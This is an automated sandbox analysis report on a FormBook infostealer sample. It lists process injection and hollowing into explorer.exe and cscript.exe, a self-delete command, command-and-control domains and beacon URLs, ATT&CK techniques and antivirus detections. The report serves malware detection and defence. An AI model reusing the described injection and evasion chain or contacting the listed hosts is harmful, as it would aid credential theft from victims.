          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489B944 mov eax, dword ptr fs:[00000030h]18_2_0489B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0489B944 mov eax, dword ptr fs:[00000030h]18_2_0489B944
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487C962 mov eax, dword ptr fs:[00000030h]18_2_0487C962
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B171 mov eax, dword ptr fs:[00000030h]18_2_0487B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487B171 mov eax, dword ptr fs:[00000030h]18_2_0487B171
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AD294 mov eax, dword ptr fs:[00000030h]18_2_048AD294
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AD294 mov eax, dword ptr fs:[00000030h]18_2_048AD294
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]18_2_048752A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]18_2_048752A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]18_2_048752A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]18_2_048752A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048752A5 mov eax, dword ptr fs:[00000030h]18_2_048752A5
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488AAB0 mov eax, dword ptr fs:[00000030h]18_2_0488AAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0488AAB0 mov eax, dword ptr fs:[00000030h]18_2_0488AAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048AFAB0 mov eax, dword ptr fs:[00000030h]18_2_048AFAB0
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2ACB mov eax, dword ptr fs:[00000030h]18_2_048A2ACB
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048A2AE4 mov eax, dword ptr fs:[00000030h]18_2_048A2AE4
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04888A0A mov eax, dword ptr fs:[00000030h]18_2_04888A0A
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AA16 mov eax, dword ptr fs:[00000030h]18_2_0493AA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493AA16 mov eax, dword ptr fs:[00000030h]18_2_0493AA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487AA16 mov eax, dword ptr fs:[00000030h]18_2_0487AA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0487AA16 mov eax, dword ptr fs:[00000030h]18_2_0487AA16
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04893A1C mov eax, dword ptr fs:[00000030h]18_2_04893A1C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]18_2_04875210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov ecx, dword ptr fs:[00000030h]18_2_04875210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]18_2_04875210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04875210 mov eax, dword ptr fs:[00000030h]18_2_04875210
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B4A2C mov eax, dword ptr fs:[00000030h]18_2_048B4A2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_048B4A2C mov eax, dword ptr fs:[00000030h]18_2_048B4A2C
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_0493EA55 mov eax, dword ptr fs:[00000030h]18_2_0493EA55
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]18_2_04879240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]18_2_04879240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]18_2_04879240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04879240 mov eax, dword ptr fs:[00000030h]18_2_04879240
          Source: C:\Windows\SysWOW64\cscript.exeCode function: 18_2_04904257 mov eax, dword ptr fs:[00000030h]18_2_04904257
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.fredrika-stahl.com
          Source: C:\Windows\explorer.exeDomain query: www.purpleqube.com
          Source: C:\Windows\explorer.exeDomain query: www.motivactivewear.com
          Source: C:\Windows\explorer.exeDomain query: www.reufhroir.com
          Source: C:\Windows\explorer.exeNetwork Connect: 119.81.95.146 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.tori2020.com
          Source: C:\Windows\explorer.exeNetwork Connect: 184.168.131.241 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 94.136.40.51 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.doodstore.net
          Source: C:\Windows\explorer.exeDomain query: www.mutanterestaurante.com
          Source: C:\Windows\explorer.exeDomain query: www.5xlsteve.com
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.177.12 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 50.87.146.99 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.oceancollaborative.com
          Source: C:\Windows\explorer.exeNetwork Connect: 75.2.124.199 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.9wsc.com
          Source: C:\Windows\explorer.exeDomain query: www.underce.com
          Source: C:\Windows\explorer.exeNetwork Connect: 222.239.248.209 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.kocaelimanliftkiralama.site
          Source: C:\Windows\explorer.exeNetwork Connect: 67.199.248.12 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 23.225.101.32 80Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Users\user\Desktop\WXs8v9QuE7.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection loaded: unknown target: C:\Windows\SysWOW64\cscript.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeThread register set: target process: 3472Jump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeSection unmapped: C:\Windows\SysWOW64\cscript.exe base address: AC0000Jump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Users\user\Desktop\WXs8v9QuE7.exe 'C:\Users\user\Desktop\WXs8v9QuE7.exe' Jump to behavior
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeProcess created: C:\Windows\SysWOW64\cscript.exe C:\Windows\SysWOW64\cscript.exeJump to behavior
          Source: C:\Windows\SysWOW64\cscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\WXs8v9QuE7.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.245636520.0000000005EA0000.00000004.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.258808512.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.235951037.0000000001640000.00000002.00000001.sdmp, cscript.exe, 00000012.00000002.494686146.0000000003100000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\WXs8v9QuE7.exeCode function: 0_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_004030FB

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000001.231883360.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301526292.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301567040.00000000004C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.234632284.0000000002280000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.493603616.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.492153305.0000000000560000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000012.00000002.494502874.0000000002CF0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.301714612.00000000005D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.WXs8v9QuE7.exe.2280000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.WXs8v9QuE7.exe.400000.0.raw.unpack, type: UNPACKEDPE

          Mitre Att&ck Matrix

          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
          Valid AccountsNative API1Path InterceptionProcess Injection512Virtualization/Sandbox Evasion3Input Capture1Security Software Discovery131Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationSystem Shutdown/Reboot1
          Default AccountsShared Modules1Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection512LSASS MemoryVirtualization/Sandbox Evasion3Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer3Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
          Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Deobfuscate/Decode Files or Information1Security Account ManagerProcess Discovery2SMB/Windows Admin SharesClipboard Data1Automated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
          Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Obfuscated Files or Information3NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
          Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing11LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
          Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Information Discovery13VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

          Behavior Graph

          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet
          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 438542 Sample: WXs8v9QuE7.exe Startdate: 22/06/2021 Architecture: WINDOWS Score: 100 33 www.shenghui118.com 2->33 35 www.reufhroir.com 2->35 37 2 other IPs or domains 2->37 53 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->53 55 Found malware configuration 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 5 other signatures 2->59 10 WXs8v9QuE7.exe 19 2->10         started        14 explorer.exe 2->14         started        signatures3 process4 dnsIp5 29 C:\Users\user\AppData\Local\...\pplsesniiplv, DOS 10->29 dropped 31 C:\Users\user\AppData\Local\...\System.dll, PE32 10->31 dropped 67 Detected unpacking (changes PE section rights) 10->67 69 Maps a DLL or memory area into another process 10->69 71 Tries to detect virtualization through RDTSC time measurements 10->71 17 WXs8v9QuE7.exe 10->17         started        39 mutanterestaurante.com 50.87.146.99, 49749, 80 UNIFIEDLAYER-AS-1US United States 14->39 41 www.fredrika-stahl.com 185.53.177.12, 49743, 80 TEAMINTERNET-ASDE Germany 14->41 43 16 other IPs or domains 14->43 73 System process connects to network (likely due to code injection or exploit) 14->73 20 autoconv.exe 14->20         started        file6 signatures7 process8 signatures9 45 Modifies the context of a thread in another process (thread injection) 17->45 47 Maps a DLL or memory area into another process 17->47 49 Sample uses process hollowing technique 17->49 51 Queues an APC in another process (thread injection) 17->51 22 cscript.exe 17->22         started        process10 signatures11 61 Modifies the context of a thread in another process (thread injection) 22->61 63 Maps a DLL or memory area into another process 22->63 65 Tries to detect virtualization through RDTSC time measurements 22->65 25 cmd.exe 1 22->25         started        process12 process13 27 conhost.exe 25->27         started       

          Screenshots

          Thumbnails

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

          windows-stand

          Antivirus, Machine Learning and Genetic Malware Detection

          Initial Sample

          SourceDetectionScannerLabelLink
          WXs8v9QuE7.exe19%VirustotalBrowse
          WXs8v9QuE7.exe20%ReversingLabs
          WXs8v9QuE7.exe100%Joe Sandbox ML

          Dropped Files

          SourceDetectionScannerLabelLink
          C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll0%MetadefenderBrowse
          C:\Users\user\AppData\Local\Temp\nsa7685.tmp\System.dll0%ReversingLabs

          Unpacked PE Files

          SourceDetectionScannerLabelLinkDownload
          18.2.cscript.exe.748a10.0.unpack100%AviraTR/Patched.Ren.GenDownload File
          18.2.cscript.exe.4d87960.5.unpack100%AviraTR/Patched.Ren.GenDownload File
          1.1.WXs8v9QuE7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.2.WXs8v9QuE7.exe.400000.0.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          0.2.WXs8v9QuE7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.2.WXs8v9QuE7.exe.2280000.2.unpack100%AviraTR/Crypt.ZPACK.GenDownload File
          1.0.WXs8v9QuE7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File
          0.0.WXs8v9QuE7.exe.400000.0.unpack100%AviraHEUR/AGEN.1130366Download File

          Domains

          SourceDetectionScannerLabelLink
          www.fredrika-stahl.com0%VirustotalBrowse

          URLs

          SourceDetectionScannerLabelLink
          http://www.doodstore.net/bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.5xlsteve.com/bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
          http://www.mutanterestaurante.com/bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.tori2020.com/bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.motivactivewear.com/bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          http://www.tiro.com0%URL Reputationsafe
          www.oceancollaborative.com/bp3i/0%Avira URL Cloudsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.goodfont.co.kr0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.carterandcone.coml0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.sajatypeworks.com0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.typography.netD0%URL Reputationsafe
          http://www.fredrika-stahl.com/bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0W0%Avira URL Cloudsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://fontfabrik.com0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.founder.com.cn/cn0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
          https://www.123-reg-new-domain.co.uk/iframe.html0%Avira URL Cloudsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.sandoll.co.kr0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.urwpp.deDPlease0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.zhongyicts.com.cn0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.sakkal.com0%URL Reputationsafe
          http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0W100%Avira URL Cloudphishing

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.5xlsteve.com
          		94.136.40.51
          		truetrue
            		unknown
            www.fredrika-stahl.com
            		185.53.177.12
            		truetrueunknown
            vallble01.xshoppy.shop
            		75.2.124.199
            		truetrue
              		unknown
              www.grpsexportsandimports.com
              		52.74.134.26
              		truefalse
                		unknown
                www.shenghui118.com
                		45.192.104.89
                		truetrue
                  		unknown
                  doodstore.net
                  		67.199.248.12
                  		truetrue
                    		unknown
                    purpleqube.com
                    		119.81.95.146
                    		truetrue
                      		unknown
                      www.tori2020.com
                      		222.239.248.209
                      		truetrue
                        		unknown
                        www.9wsc.com
                        		23.225.101.32
                        		truetrue
                          		unknown
                          mutanterestaurante.com
                          		50.87.146.99
                          		truetrue
                            		unknown
                            motivactivewear.com
                            		34.102.136.180
                            		truefalse
                              		unknown
                              oceancollaborative.com
                              		184.168.131.241
                              		truetrue
                                		unknown
                                www.purpleqube.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.motivactivewear.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.reufhroir.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.doodstore.net
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.mutanterestaurante.com
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.oceancollaborative.com
                                          		unknown
                                          		unknowntrue
                                            		unknown
                                            www.underce.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.kocaelimanliftkiralama.site
                                              		unknown
                                              		unknowntrue
                                                		unknown
                                                www.kesat-ya10.com
                                                		unknown
                                                		unknowntrue
                                                  		unknown

                                                  Contacted URLs

                                                  NameMaliciousAntivirus DetectionReputation
                                                  http://www.doodstore.net/bp3i/?2db=/O9fLU9fKPl9hp8FjcQBjfSEDJBN8B2QQZ2zni9zphKaS5k3K3CvlS+mwENkfwkv1cT8&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.5xlsteve.com/bp3i/?2db=zbNXh78uhP7VzN8kPHFueaY47g6J6psPJhyFJvfKuCHih9LJaB8PnmAAQmuNnVgiv7yX&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.mutanterestaurante.com/bp3i/?2db=E7M2l69Gv0yeE4KBOXHGh6mx//FtP199Dh6qlRwE96ss/V1ksNZ+8ksSpGi6EwZCpyax&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.tori2020.com/bp3i/?2db=MlxGGjj2GILR3uc1yrCD+B+Qm9+cwVH8bO7hosl1JjKtZPf8ruvdLFpmglVOZIulzoDe&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.motivactivewear.com/bp3i/?2db=zzYPr0OAQH7TXWaM6HNOV25V/HRJbXLG3d0AEq0Xu0niOsubCwaCiuhJfb7NIA/TR+lf&ApZx=O2MHiVr0Wfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  www.oceancollaborative.com/bp3i/true
                                                  • Avira URL Cloud: safe
                                                  		low
                                                  http://www.fredrika-stahl.com/bp3i/?2db=cas+hsZJvZFo3GF+EdMNCMOiV1dGjFKaknimsFdRmzAJWDDXgl+w3pBTGW4WB38KsB49&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  http://www.purpleqube.com/bp3i/?2db=IkQuCFl7MCfBRj/Vz+o9SZKu4zQeP+5HQLx8WUcJbeVktEW19wEdA8Etbmrh51eTDYYM&ApZx=O2MHiVr0Wtrue
                                                  • Avira URL Cloud: phishing
                                                  		unknown

                                                  URLs from Memory and Binaries

                                                  NameSourceMaliciousAntivirus DetectionReputation
                                                  http://www.apache.org/licenses/LICENSE-2.0explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                      		high
                                                      http://www.fontbureau.com/designersGexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                        		high
                                                        http://www.fontbureau.com/designers/?explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                          		high
                                                          http://www.founder.com.cn/cn/bTheexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fontbureau.com/designers?explorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                            		high
                                                            http://www.tiro.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.fontbureau.com/designersexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                              		high
                                                              http://nsis.sf.net/NSIS_ErrorErrorWXs8v9QuE7.exefalse
                                                                		high
                                                                http://www.goodfont.co.krexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.carterandcone.comlexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.sajatypeworks.comexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.typography.netDexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://www.fontbureau.com/designers/cabarga.htmlNexplorer.exe, 00000004.00000000.252919893.000000000BC36000.00000002.00000001.sdmpfalse
                                                                  		high
